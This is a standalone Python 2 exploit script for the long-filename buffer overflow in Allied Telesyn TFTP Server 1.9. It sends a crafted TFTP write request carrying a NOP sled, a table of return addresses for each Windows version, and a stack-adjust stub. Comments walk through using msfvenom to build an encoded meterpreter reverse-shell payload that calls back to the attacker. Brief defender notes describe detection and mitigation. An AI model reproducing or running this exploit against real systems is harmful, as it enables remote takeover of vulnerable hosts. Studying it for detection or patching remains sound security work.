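#!/usr/bin/python
# Standalone exploit for Allied Telesyn TFTP Server 1.9
# Written by daleksec 07/21/2016
# Special thanks to NetSec.ws for the excellent walk through (see http://netsec.ws/?p=262)
#
# Packet layout (TFTP, RFC 1350): opcode 0x0002 (WRQ), then the filename field,
# then "\x00netascii\x00" as the transfer mode.  The filename field is where the
# overflow lives: NOP padding, the user-supplied payload, a per-OS return address
# and a short x86 stub ("\x83\xc4\x28\xc3" = add esp, 0x28; ret).
#
# Defender notes: on the wire this is a single UDP datagram whose WRQ filename
# field is a few hundred bytes of mostly non-printable data.  TFTP filenames are
# normally short printable paths, so a length/charset check on the filename field
# of opcode-2 packets is a cheap detection; the mitigation is to retire or patch
# the server and keep TFTP off untrusted networks.
#
# Python 2 script: the string literals below are byte strings.  Under Python 3
# they are text and socket.sendto() rejects them with a TypeError.
import sys, socket

# Four positional arguments are required: victim IP, victim port, attacker IP,
# OS index.  The original check (`<= 2`) let a three-argument run die with an
# IndexError on sys.argv[4] instead of printing the usage text.
if len(sys.argv) < 5:
    sys.exit('''Usage: python attftp_long_filename.py
0 Windows NT SP4 English
1 Windows 2000 SP0 English
2 Windows 2000 SP1 English
3 Windows 2000 SP2 English
4 Windows 2000 SP3 English
5 Windows 2000 SP4 English
6 Windows XP SP0/1 English
7 Windows XP SP2 English
8 Windows XP SP3 English
9 Windows Server 2003
10 Windows Server 2003 SP2
''')

host = sys.argv[1]             # Victim's IP
port = int(sys.argv[2])        # Victim's Port
lhost = sys.argv[3]            # Attacker's IP
os_choice = int(sys.argv[4])   # OS Choice; renamed from `os` so it no longer shadows the stdlib module name

# Return addresses (Source: Metasploit), indexed by the OS choice above.
ret = ["\xf7\xa6\x2e\x70",
       "\xc3\x62\x03\x75",
       "\x85\x1d\x03\x75",
       "\x1b\x43\x03\x75",
       "\x5a\x1c\xfe\x74",
       "\xce\x1d\x03\x75",
       "\xfb\x7b\xab\x71",
       "\x72\x93\xab\x71",
       "\x53\x93\x42\x7e",
       "\xd3\xfe\x86\x7c",
       "\x1b\xa0\x86\x7c"]

# Reject an index outside the table up front rather than failing with an
# IndexError while building the packet.
if not 0 <= os_choice < len(ret):
    sys.exit("OS choice must be between 0 and %d" % (len(ret) - 1))

# Create a NOP string as to bring NOPs + LHOST up to 25 bytes.
# NOTE(review): lhost is never placed in the packet itself; it only sizes the
# NOP sled (and the sled collapses to "" once len(lhost) > 25).  Presumably the
# author relied on the encoded payload's length tracking the LHOST baked into
# it -- confirm against the payload actually generated.
nop = "\x90" * (25-len(lhost))

# The payload must be customized to include your own IP address and listening port, so you'll need to generate it manually.
# To do so, use the following steps:
# 1.) Enter the following to create a hex file of the amount that needs to be subtracted from the stack pointer (3500):
#     perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
# 2.) Next, use the following command to create a staged meterpreter shell payload:
#     msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
# 3.) Then, combine the two files you just created.
#     cat stackadj payload > shellcode
# 4.) Finally, let's eliminate the bad characters.
#     msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
# Enter the output as the value of the "payload" variable.
# You may need to run this exploit a few times for it to work.
payload = ""  # Payload (bad characters = \x00, stack adjustment = -3500, can't exceed 210 bytes of space)
# payload += ""
# payload += ""
# ...

# Our exploit so far: WRQ opcode, overflowing filename field, trailing mode string.
exploit = "\x00\x02" + nop + payload + ret[os_choice] + "\x83\xc4\x28\xc3\x00netascii\x00"

# Declare a UDP socket and send the single datagram to the nominated address;
# the socket is closed afterwards instead of being left to the interpreter.
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    client.sendto(exploit, (host, port))
finally:
    client.close()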